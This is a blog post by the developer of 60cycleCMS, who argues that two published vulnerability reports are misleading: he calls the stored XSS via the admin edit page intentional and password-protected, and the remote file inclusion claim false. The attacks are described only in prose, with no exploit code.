<%= NewRelic::Agent.browser_timing_header rescue "" %>

David van Geest

Software, Life, and Stuff I Couldn't Find on the Internet

Supposed security vulnerabilities in 60cycleCMS

| Comments

Googling 60cycleCMS these days brings up a few "security vulnerabilities" that, at first glance, are somewhat alarming. The first alleged vulnerability is generally described as an HTML injection or a persistent XSS (cross-site scripting) vulnerability. Here's a link to a report (the reports tend to multiply across the web, so there are other sites describing the same exploit).

I'm all for transparency and openness in coding, and I'm glad people take time to expose vulnerabilities in others' code. However, this XSS "vulnerability" really needs to be put in context.

The XSS exploit states that an attacker can insert malicious HTML or Javascript into an existing post using the "Edit" feature of 60cycleCMS because the user input is unvalidated. While the unvalidated input part of this exploit is true, it is intentional and, when the CMS is installed as intended, does not expose the website to attack. Let me elaborate somewhat. The user input is unvalidated to allow a website author to post any HTML content they want. When I write this post I don't want to fight my own HTML filters. Secondly, the page in question (private/select.php?act=edit) is a private page, if the exploit author had bothered to read the readme or install the CMS, he would have noticed that install process password protects that area of the site using an .htaccess file. Therefore, only the website author (presumably trusted….) may post unfiltered HTML and/or Javascript on the site. If you were to un-protect the private admin section of the site, then this exploit would be possible, but then of course an attacker could do anything they wanted to, whether it be deleting your posts or changing your database configuration. Presumably my users are not stupid enough to leave themselves open this way.

The second supposed vulnerability is a remote file inclusion vulnerability. Here's a link. Originally posted over at exploit-db.com, this exploit claimed that you could include a remote file in the PHP powering the CMS, thus allowing you to execute arbitrary code on the webserver. The "exploit" centered around overwriting the $_SERVER variable so that the CMS would load the config.php file from another location besides the usual (one level above website root). This vulnerability is just plain false. PHP does not allow a remote user to override the $_SERVER variable, for obvious reasons. There's an email thread discussing this in more detail here. The exploit has been removed from ExploitDB (I can only assume because it is incorrect), but a few sites around the web still have it up.

The point is, don't believe everything you read on the web. It would seem there's people out there trying to make us think they're l33t hackers by exposing security vulnerabilities when, in reality, they don't do their homework and are sometimes just plain wrong. If you do have any concerns about the security of 60cycleCMS, please contact me or leave a comment, and I will be happy to discuss your concerns.